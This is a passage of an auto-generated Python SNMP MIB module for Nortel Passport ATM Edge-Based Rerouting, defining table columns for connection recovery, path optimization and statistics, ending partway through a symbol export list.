Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12))\nmscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30), )\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))\nmscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatus.setStatus('mandatory')\nmscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrComponentName.setStatus('mandatory')\nmscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrStorageType.setStatus('mandatory')\nmscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfPnniEbrIndex.setStatus('mandatory')\nmscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrProvTable.setStatus('mandatory')\nmscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrProvEntry.setStatus('mandatory')\nmscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrOperTable.setStatus('mandatory')\nmscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrOperEntry.setStatus('mandatory')\nmscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrStatsTable.setStatus('mandatory')\nmscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')\natmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))\natmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))\natmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3))\natmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3, 2))\natmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))\natmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1))\natmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3))\natmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3, 2))\nmibBuilder.exportSymbols(\"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA, mscAtmIfUniEbrTotalConnectionRecoveries=mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=mscAtmIfVptPnniEbrProvEntry, mscAtmIfVptVccEbrInfoTotalPathOptimizations=mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup, mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery, mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry, mscAtmIfVptUniEbrTotalPathOptimizations=mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr, mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization, mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry, mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType, mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus, mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable, mscAtmIfVptPnniEbrSubscribedConnections=mscAtmIfVptPnniEbrSubscribedConnections, mscAtmIfVccEbrInfoTotalPathOptimizations=mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=mscAtmIfVptUniEbrProvEntry, mscAtmIfVptPnniEbrEligibleRecoveredConnections=mscAtmIfVptPnniEbrEligibleRecoveredConnections, mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName, mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry, mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex, mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType, mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable, mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization, mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry, mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry, mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType, mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry, mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex, mscAtmIfPnniEbrTotalConnectionRecoveries=mscAtmIfPnniEbrTotalConnectionRecoveries, mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable, mscAtmIfPnniEbrEligibleRecoveredConnections=mscAtmIfPnniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoRecoverySubscribed=mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=mscAtmIfVptVccSrcEbrOvProvTable, mscAtmIfVptVccEbrInfoConnectionRecovered=mscAtmIfVptVccEbrInfoConnectionRecovered, mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName, mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName, mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry, mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName, mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry, mscAtmIfVptIispEbrTotalPathOptimizations=mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex, mscAtmIfVptUniEbrIneligibleRecoveredConnections=mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=mscAtmIfVpcSrcEbrOvOptimizationSubscribed, mscAtmIfIispEbrTotalPathOptimizations=mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName=mscAtmIfVccSrcEbrOvComponentName, mscAtmIfVccSrcEbrOvOptimizationSubscribed=mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=mscAtmIfIispEbrRowStatusEntry, mscAtmIfVptIispEbrIneligibleRecoveredConnections=mscAtmIfVptIispEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A, mscAtmIfVptVccEbrInfoOptimizationSubscribed=mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=mscAtmIfPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable, mscAtmIfVptPnniEbrIneligibleRecoveredConnections=mscAtmIfVptPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcEbrInfoConnectionRecovered=mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex, mscAtmIfVptUniEbrTotalConnectionRecoveries=mscAtmIfVptUniEbrTotalConnectionRecoveries, mscAtmIfVpcEbrInfoTotalConnectionRecoveries=mscAtmIfVpcEbrInfoTotalConnectionRecoveries, mscAtmIfVptVccSrcEbrOvRowStatusEntry=mscAtmIfVptVccSrcEbrOvRowStatusEntry, mscAtmIfIispEbrTotalConnectionRecoveries=mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr, mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry, mscAtmIfVptPnniEbrTotalConnectionRecoveries=mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=mscAtmIfVptVccSrcEbrOvComponentName, mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery, mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType, mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv, mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable, mscAtmIfUniEbrEligibleRecoveredConnections=mscAtmIfUniEbrEligibleRecoveredConnections, mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry, mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus, mscAtmIfIispEbrEligibleRecoveredConnections=mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=mscAtmIfPnniEbrConnectionRecovery, mscAtmIfVccEbrInfoConnectionRecovered=mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=mscAtmIfVccEbrInfoStatsEntry, mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=mscAtmIfVptVccEbrInfoTotalConnectionRecoveries, mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType, mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry, mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable, mscAtmIfVccSrcEbrOvRecoverySubscribed=mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=atmEbrCapabilities, mscAtmIfUniEbrComponentName=mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=mscAtmIfPnniEbrTotalPathOptimizations, mscAtmIfUniEbrIneligibleRecoveredConnections=mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=mscAtmIfVptVccSrcEbrOvProvEntry, 